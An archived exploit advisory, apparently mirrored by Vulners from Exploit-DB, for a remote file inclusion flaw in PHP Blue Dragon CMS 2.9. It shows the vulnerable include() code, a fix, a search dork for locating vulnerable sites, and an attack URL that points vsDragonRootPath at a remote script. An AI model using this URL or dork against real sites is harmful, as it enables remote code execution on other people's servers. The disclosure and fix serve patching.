Lucene search
+L

PHP Blue Dragon CMS 2.9 - Remote File Inclusion

🗓️ 12 May 2006 00:00:00Reported by KacperType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

PHP Blue Dragon CMS 2.9 - Remote File Inclusion vulnerability patche

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-2392
16 May 200601:00
cve
cvelist
Cvelist
CVE-2006-2392
16 May 200601:00
cvelist
nvd
NVD
CVE-2006-2392
16 May 200601:02
nvd
prion
Prion
Remote file inclusion
16 May 200601:02
prion
prion
Prion
Remote file inclusion
13 Aug 200721:17
prion
################DEVIL TEAM THE BEST POLISH TEAM#################
#Php Blue Dragon Platinum - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#dork: powered by Php Blue Dragon Platinum
################################################################
[code]
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]

Fix:
[code]
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]

# milw0rm.com [2006-05-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 May 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.07675
39